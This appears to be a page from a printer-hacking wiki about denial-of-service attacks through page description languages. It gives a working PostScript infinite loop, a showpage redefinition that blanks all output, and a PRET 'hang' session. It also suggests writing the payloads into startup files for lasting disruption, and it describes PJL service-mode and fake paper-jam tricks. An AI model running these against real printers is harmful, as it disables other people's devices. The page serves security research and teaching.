Document Processing

Page description languages allowing infinite loops or calculations that require a lot of computing time. Even minimalist languages like PCL can be used to upload permanent macros or fonts until the available memory is consumed.

PostScript

Infinite loops

%!
{} loop

Using PRET:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> hang
Warning: This command causes an infinite loop rendering the
device useless until manual restart. Press CTRL+C to abort.
Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!

Redefine showpage

By setting showpage – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed they won't print anything.

true 0 startjob
/showpage {} def

Using PRET:

Both attacks code can also be written into Sys/Start, startup.ps or similar files to cause permanent DoS on devices with a writable disk.

PJL

PJL jobmedia

Proprietary PJL commands can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below:

Using PRET:

Offline mode

In addition, the PJL standard defines the OPMSG command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below:

Using PRET:

Learn more about these attacks in http://hacking-printers.net/wiki/index.php/Document_processing****

PreviousCross-Site PrintingNextFactory Defaults

Last updated